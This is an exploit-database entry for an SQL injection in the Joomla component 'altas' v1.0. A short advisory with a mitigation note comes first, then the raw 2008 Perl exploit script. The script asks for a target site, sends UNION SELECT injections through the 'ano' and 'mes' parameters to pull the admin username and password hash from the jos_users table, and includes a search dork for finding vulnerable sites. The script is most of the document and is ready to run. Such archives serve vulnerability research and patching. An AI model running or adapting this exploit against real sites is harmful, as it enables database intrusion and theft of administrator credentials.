header-logo
Suggest Exploit
vendor:
altas
by:
Houssamix From H-T Team
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: altas
Affected Version From: 1
Affected Version To: 1
Patch Exists: YES
Related CWE: N/A
CPE: a:ilihost:altas
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2007

Joomla Component altas v 1.0 Multiple Remote SQL Injection

A vulnerability in Joomla Component altas v 1.0 allows an attacker to inject malicious SQL commands into the vulnerable application. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code in the 'mes' and 'ano' parameters of the 'index.php' script. Successful exploitation of this vulnerability can allow an attacker to gain access to sensitive information from the database, modify data, or exploit further vulnerabilities.

Mitigation:

The vendor has released an update to address this vulnerability. Users are advised to update to the latest version of the component.
Source

Exploit-DB raw data:

#!/usr/bin/perl -w

#   Joomla Component altas  v 1.0  Multiple Remote SQL Injection
#  variables vuln : ( ano )  & ( mes ) 

#[*] Found by : Houssamix From H-T Team 

#[*] H-T Team [ HouSSaMix + ToXiC350 ] 
#[*] Greetz :  Islamic Security Team  &  and all musulmans hackers

#[*] Component_Name:   altas
#[*] Script_Name: Joomla
#[*] Dork : index.php?option=com_altas

# <name>altas</name>
# <creationDate>10/09/2007</creationDate>
# <author>Ilimitada Hosting Co.</author>
# <copyright>(c) 2007</copyright>
# <authorEmail>soporte@ilihost.com</authorEmail>
# <authorUrl>www.ilihost.com</authorUrl>
# <version>1.0</version>

system("color f");
print "\t\t========================================================\n\n";
print "\t\t#                   Viva Islam    	                  #\n\n";
print "\t\t========================================================\n\n";
print "\t\t# Joomla Component altas v 1 multiple SQL Injection 	  #\n\n";
print "\t\t========================================================\n\n";
print "\t\t#       H-T Team [HouSSaMiX - ToXiC350]	          	  #\n\n";
print "\t\t========================================================\n\n";

use LWP::UserAgent;

print "\nEnter your Target (http://site.com/joomla/): ";
	chomp(my $target=<STDIN>);

$uname="username";
$magic="jos_users";

$b = LWP::UserAgent->new() or die "Could not initialize browser\n";
$b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');

$host = $target . "index.php?option=com_altas&mes=hsmx&ano=-1%20union%20select%201,2,concat(CHAR(60,117,115,101,114,62),".$uname.",CHAR(60,117,115,101,114,62)),4,5,6,7,8 from/**/".$magic."/**";
$res = $b->request(HTTP::Request->new(GET=>$host));
$answer = $res->content;

print "\n[+] The Target : ".$target."";

if ($answer =~ /<user>(.*?)<user>/){
       
		print "\n[+] Admin User : $1";
}
$host2 = $target . "index.php?option=com_altas&mes=-1%20union%20select%201,2,password,4,5,6,7,8/**/from/**/jos_users--";
$res2 = $b->request(HTTP::Request->new(GET=>$host2));
$answer = $res2->content;
if ($answer =~/([0-9a-fA-F]{32})/){
		print "\n[+] Admin Hash : $1\n\n";
		print "#   Exploit succeed!  #\n\n";
}
else{print "\n[-] Exploit Failed...\n";
}

# coded  by Houssamix From H-T Team

# milw0rm.com [2008-07-04]